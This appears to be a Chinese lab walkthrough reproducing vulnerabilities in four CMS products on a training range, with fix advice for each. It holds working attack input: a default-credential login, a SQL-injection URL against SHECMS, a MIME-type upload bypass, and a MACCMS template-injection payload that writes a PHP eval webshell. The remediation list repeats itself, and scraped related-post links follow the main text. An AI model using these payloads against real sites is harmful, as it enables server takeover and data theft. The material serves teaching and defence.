CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
CMS漏洞
- 发货100CMS(弱口令)
- 介绍
- 系统版本
- 靶场搭建
- 漏洞复现
- 修复方案
- SHECMS(SQL注入)
- 介绍
- 系统版本
- 靶场搭建
- 漏洞复现
- 修复方案
- ZHCMS(文件上传)
- 介绍
- 系统版本
- 靶场搭建
- 漏洞复现
- 修复方案
- MACCMS(CNVD-2019-43865)
- 介绍
- 系统版本
- 靶场搭建
- 漏洞复现
- 修复方案
发货100CMS(弱口令)
介绍
- 弱口令漏洞
由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作。
系统版本
Apache:------2.4.7
100 CMS:----v1.0_build20200117
靶场搭建
东塔靶场发货100CMS
漏洞复现
后台地址
后台地址: http://ip:port/admin/login.phpadmin/login.php
登录admin admin用户即可成功登入
修复方案
强制用户首次登录时修改默认口令,或是使用用户自定义初始密码的策略;
完善密码策略,信息安全最佳实践的密码策略为8位(包括)以上字符,包含数字、大小写字母、特殊字符中的至少3种。
增加人机验证机制,限制IP访问次数。
SHECMS(SQL注入)
介绍
SQL注入漏洞
Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。SHECMS v1.7
SHECMS商城系统是将商品展示、在线购物、订单管理、支付管理、文章管理、客户咨询反馈等功能相结合,并提供了简易的操作、实用的功能,快速让用户建立个性化的网上商店,为用户提供了一个低成本、高效率的网上商城建设方案
系统版本
Apache:-------2.4.7
SHECMS:----v1.7
靶场搭建
东塔靶场SHECMS
漏洞复现
可以跳转到支付接口
http://ip:port/include/plugin/payment/alipay/pay.php
在首页访问
/include/plugin/payment/alipay/pay.php?id=pay`+where+1=1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12#_
页面使用burp抓包发送到重放模块构造sql注入语句
此实验往后面注入过滤了单引号,并且在payload中不能出现下划线,导致无法查出数据库中的大部分数据
修复方案
- 构造的sql语句时使用参数化形式而不使用拼接方式能够可靠地避免sql注入,主流的数据库和语言都支持参数化形式
- 拼接加对输入进行单引号和sql关键字过滤的方法也能在一定程度上防护sql注入
- 采用sql语句预编译和绑定变量
- 严格检查参数的数据类型,还有可以使用一些安全函数,来防止sql注入
- 拼接加对输入进行单引号和sql关键字过滤的方法也能在一定程度上防护sql注入
- 采用sql语句预编译和绑定变量
- 严格检查参数的数据类型,还有可以使用一些安全函数,来防止sql注入
- 采用sql语句预编译和绑定变量
- 严格检查参数的数据类型,还有可以使用一些安全函数,来防止sql注入
ZHCMS(文件上传)
介绍
文件上传漏洞简介
在文件上传的功能处,若服务端脚本语言未对上传的文件进行严格验证和过滤,导致恶意用户上传恶意的脚本文件时,就有可能获取执行服务端命令的能力,这就是文件上传漏洞。文件上传漏洞对Web应用来说是一种非常严重的漏洞。一般情况下,Web应用都会允许用户上传一些文件,如头像、附件等信息,如果Web应用没有对用户上传的文件进行有效的检查过滤,那么恶意用户就会上传一句话木马等Webshell,从而达到控制Web网站的目的.
ZHCMS
ZHCMS系统是由BraveGuo根据几年的开发经验积累而成的一个高效、简洁、安全的cms系统,无任何多余累赘的功能;高效的页面执行效率,特别优化系统安全性能,可令你在茫茫网海中一支独秀。java+mysql的完美结合。自创的模板引擎;因为BraveGuo以前是asp、php和net的程序员,所以在模板中引入了一些其他语言的优秀之处。系统是由内容发布(包含一个简易的缓存和一个简易的数据库连接池)组成,其他的所有的功能都是以插件形式出现,可以随时开启和关闭。
MIME检测
服务端MIME类型检测是通过检查http包的Content-Type字段中的值来判断上传文件是否合法的。
系统版本
Apache:-------2.4.7
靶场搭建
东塔靶场ZHCMS
漏洞复现
爆破到一个弱口令账户,可惜没有后台登录权限
有图片上传界面,尝试上传php被拦截,后改格式
burp上传改格式
Connact-Type: image/jpeg
蚁剑连接即可得到shell后台
修复方案
- 对上传的文件在服务器上存储时进行重命名
- 禁止上传危险的文件类型,如jsp jar war等
- 只接收指定类型的文件
- 上传文件做日志记录
MACCMS(CNVD-2019-43865)
介绍
- 苹果CMS V8 V10版本存在代码重装漏洞,以及代码后门漏洞,任意文件删除漏洞,通过CNVD-2019-43865的信息安全漏洞通报,可以确认maccms V10存在漏洞,可以伪造恶意代码发送到网站后端进行执行,可以删除网站目录下的任意文件,可删除重装苹果CMS系统的配置文件,导致可以重新安装maccms系统,并在安装过程中插入sql注入代码到数据库中去执行并获取webshell以及服务器权限。
系统版本
Apache:-------2.4.7
靶场搭建
东塔靶场MACCMS
漏洞复现
POST传值phpinfo payload:
http://ip:port/index.php?m=vod-search&wd={if-A:phpinfo()}{endif-A}
POST传值shell payload:
http://ip:port/index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A}
蚁剑连接即可
http://ip:port/test.php 密码test
修复方案
- 对任意文件删除漏洞做安全过滤与检查,防止del删除的语句的执行
- 对前端传输过来的参数进行严格的检测,不管是get,post,cookies,如果您对代码不是太懂的话也可以找专业的网站3. 安全公司来处理解决苹果CMS网站被攻击的问题,
- 对重装文件进行改名以及安装配置文件进行权限设置,只读权限
- 对于存在网站木马后门的苹果cms系统,人工对代码进行安全审计,对所有网站
- 目录下每个代码文件都要仔细的排查,可以下载官方的源代码进行比对
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战相关推荐
- APP漏洞扫描器之本地拒绝服务检测详解
APP漏洞扫描器之本地拒绝服务检测详解 作者:伊樵@阿里聚安全 阿里聚安全的Android应用漏洞扫描器有一个检测项是本地拒绝服务漏洞的检测,采用的是静态分析加动态模糊测试的方法来检测,检测结果准确全 ...
- Web网络安全漏洞分析,SQL注入原理详解
本文主要为大家介绍了Web网络安全漏洞分析SQL注入的原理详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪 一.SQL注入的基础 1.1 介绍SQL注入 SQL注入就是 ...
- CVE-2020-14750 漏洞复现和Linux打补丁详解
CVE-2020-14750 漏洞复现和Linux打补丁详解 使用的工具整理:jdk1.79,weblogic安装包(中文版),两个补丁包 链接:https://pan.baidu.com/s/1eh ...
- R语言rms包生存分析之限制性立方样条(RCS, Restricted cubic spline)分析详解实战:拟合连续性自变量和事件风险之间的关系:基于survival包lung数据
R语言rms包生存分析之限制性立方样条(RCS, Restricted cubic spline)分析详解实战:拟合连续性自变量和事件风险之间的关系:基于survival包lung数据 目录
- Spring Boot 单元测试详解+实战教程
转载自 Spring Boot 单元测试详解+实战教程 Spring Boot 的测试类库 Spring Boot 提供了许多实用工具和注解来帮助测试应用程序,主要包括以下两个模块. spring ...
- 中英文 php cms,phpcms v9英语语言包应用详解
phpcms英文二次开发之语言包详解 phpcms英文的语言包使其成为国际化的cms,从PHPCMS v9.1开始,发布了英文版.但很遇憾的是,到目前为止,PHPCMS还没有实现语言切换的功能,比如中 ...
- 89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解实战示例]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.文件包含漏洞详解 1.文件包含漏洞相关概念 2.PHP文件包含漏洞相关概念 3.PHP文件包含漏洞利用:`构 ...
- Kooboo CMS - Html.FrontHtml[Helper.cs] 各个方法详解
下面罗列了方法详解,每一个方法一篇文章. Kooboo CMS - @Html.FrontHtml().HtmlTitle() 详解 Kooboo CMS - Html.FrontHtml.Posit ...
- [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- 漏洞检测方法如何选?详解源代码与二进制SCA检测原理
摘要:本文探讨的是SCA具体的检测原理,源代码SCA检测和二进制SCA检测有哪些相同点和不同点,在进行安全审计.漏洞检测上各自又有什么样的优势和适用场景. 本文分享自华为云社区<源代码与二进制文 ...
最新文章
- python3编译exe_编译 – 如何将我的Python 3应用程序编译到.exe?
- python导入包相当于什么_Python包及其定义和引用详解
- JVM GC一次调优实战
- 好程序员分享SpringBoot须掌握的注解
- CentOS下的freenx配置
- ( 设计高效算法 ) 年龄排序 Age Sort Uva 11462
- windows7 安装MySQL 解决报错 服务没有响应控制功能
- mysql 中间表的好处_MySql 使用中间表来提高统计查询速度
- opencv之银行卡号识别
- 带经纬度的水印相机_经纬度生成小工具(仿水印相机)
- 网络教育统考计算机和英语作文,网络教育英语统考试题
- 【NFC】手机手环模拟门禁卡
- 力软下拉框多选_下拉框--可多选
- 也说类别Category
- EtherCAT (学习笔记)
- Educoder 机器学习 决策树使用之使用决策树预测隐形眼镜类型
- Mockplus Cloud自动生成规格,Mockplus Cloud交互式动画原型
- Centos7超详细服务器上安装配置教程
- Windows漏洞修复服务器,三种Windows服务器SSL/TLS的安全漏洞以及其补救方法
- 【Multisim仿真】74LS194组成的8个led流水灯